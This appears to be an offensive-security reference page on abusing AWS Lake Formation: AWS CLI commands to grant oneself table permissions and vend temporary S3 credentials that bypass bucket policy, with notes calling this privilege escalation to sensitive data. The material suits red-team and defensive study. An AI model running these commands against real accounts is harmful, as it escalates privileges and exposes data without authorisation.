Lake Formation governs access to data-lake tables and vends short-lived S3 credentials scoped to what a principal is granted. The attack is to hold or grant yourself a Lake Formation permission and then call the vending API, which returns temporary credentials for the underlying S3 data, bypassing the bucket's own policy. A principal that can administer Lake Formation grants can widen its own access to any governed table.
Vending credentials for a table#
aws lakeformation list-permissions
aws lakeformation get-temporary-glue-table-credentials \
--table-arn <table-arn> --supported-permission-types COLUMN_PERMISSION
# the response contains temporary S3 credentials for the governed data
Granting yourself access#
aws lakeformation grant-permissions \
--principal DataLakePrincipalIdentifier=<your-arn> \
--resource '{"Table":{"DatabaseName":"db","Name":"t"}}' \
--permissions SELECT
Exploitation notes#
- Credential vending returns real S3 credentials for the governed location, so it reads data even when the bucket policy would deny the caller directly.
lakeformation:GrantPermissionswith admin scope is a data-plane privilege escalation: grant then vend.- Governed tables often front the most sensitive lake data, which is why the vending path is worth the extra step.
Tools#
- AWS CLI (
lakeformation get-temporary-glue-table-credentials,grant-permissions).